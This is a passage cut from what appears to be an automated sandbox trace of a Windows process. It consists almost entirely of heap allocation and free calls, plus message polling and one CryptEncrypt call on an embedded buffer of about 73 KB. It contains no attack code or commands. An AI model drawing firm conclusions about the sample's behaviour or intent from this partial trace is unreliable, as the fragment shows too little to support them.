hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0256.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0256.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0256.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0256.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0256.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0256.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0256.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0256.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0256.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0256.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0256.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0256.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0256.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0256.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0256.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0256.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0256.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0256.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0256.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0256.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0256.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0256.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0256.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0256.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0256.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0256.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0256.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0256.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0256.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0256.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0256.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0256.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0256.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0256.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0256.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0256.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0256.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0256.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0256.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0256.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0256.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0256.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0256.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0256.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0256.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0256.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0256.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0256.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0256.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0256.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0256.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0256.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0256.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0256.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0256.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0256.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0256.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0256.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0256.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0256.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0256.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0256.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0256.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0256.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0256.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0256.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0256.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0256.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0256.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0256.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0256.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0256.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0256.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0256.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0256.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0256.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0256.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0256.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0256.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0256.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0256.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0256.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0256.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0256.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0256.596] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0256.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0256.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0256.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0256.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0256.597] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.597] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0256.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0256.597] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0256.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0256.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0256.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0256.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0256.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0256.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0256.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0256.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0256.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0256.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0256.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0256.598] CharLowerBuffW (in: lpsz="byte[73136]", cchLength=0xb | out: lpsz="byte[73136]") returned 0xb [0256.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0256.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0256.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0256.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0256.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0256.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0256.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0256.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0256.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0256.598] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0256.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0256.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0256.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0256.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0256.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0256.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0256.602] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0256.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0256.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0256.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0256.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0256.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0256.603] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0256.603] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0256.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0256.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0256.605] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0256.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0256.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0256.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0256.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0256.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51ac0 [0256.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51ac0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0256.606] CryptEncrypt (in: hKey=0xa874d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7f320*, pdwDataLen=0x8cef60*=0x11daa, dwBufLen=0x11db0 | out: pbData=0x2e7f320*, pdwDataLen=0x8cef60*=0x11db0) returned 1 [0256.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0256.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0256.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0256.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0256.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0256.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0256.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0256.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0256.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0256.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0256.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0256.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0256.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0256.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0256.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0256.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0256.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0256.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0256.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0256.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0256.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0256.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0256.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0256.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0256.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0256.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0256.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0256.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0256.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0256.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0256.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0256.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0256.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0256.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0256.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0256.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0256.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0256.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0256.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0256.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0256.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0256.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0256.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0256.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0256.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0256.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0256.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0256.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0256.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0256.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0256.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0256.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0256.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0256.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0256.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0256.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0256.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0256.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0256.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0256.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0256.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0256.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0256.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0256.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0256.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0256.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0256.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0256.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0256.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0256.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0256.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0256.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0256.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0256.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0256.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0256.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0256.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0256.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0256.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0256.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0256.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0256.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0256.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0256.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0256.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0256.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0256.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0256.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0256.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0256.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0256.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0256.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0256.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0256.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0256.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | 